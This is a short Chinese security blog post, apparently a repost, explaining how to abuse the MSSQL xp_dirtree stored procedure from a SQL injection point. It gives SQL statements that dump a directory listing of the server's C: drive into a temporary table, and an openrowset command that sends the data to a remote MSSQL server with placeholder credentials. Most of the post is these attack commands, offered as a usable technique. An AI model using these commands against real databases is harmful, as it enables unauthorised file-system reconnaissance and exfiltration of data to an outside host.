xp_dirtree利用方法

admin 2021年6月14日23:19:15评论951 views字数 460阅读1分32秒阅读模式

朋友给我一个注入点,开启了xp_cmdshell、xp_dirtree,因为权限不够,执行命令都是失败了,我只是整理下了xp_dirtree利用方式的四句话!

xp_dirtree利用方法

-建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表


create table ##nonamed(dir ntext,num int)


-调用存储过程把执行回来的数据存到临时表里面

insert ##nonamed execute master..xp_dirtree 'c:',1



--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了

可不需要:insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')




select * from ##nonamed


以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了


本文始发于微信公众号(LemonSec):xp_dirtree利用方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月14日23:19:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xp_dirtree利用方法http://cn-sec.com/archives/301609.html

发表评论

匿名网友 填写信息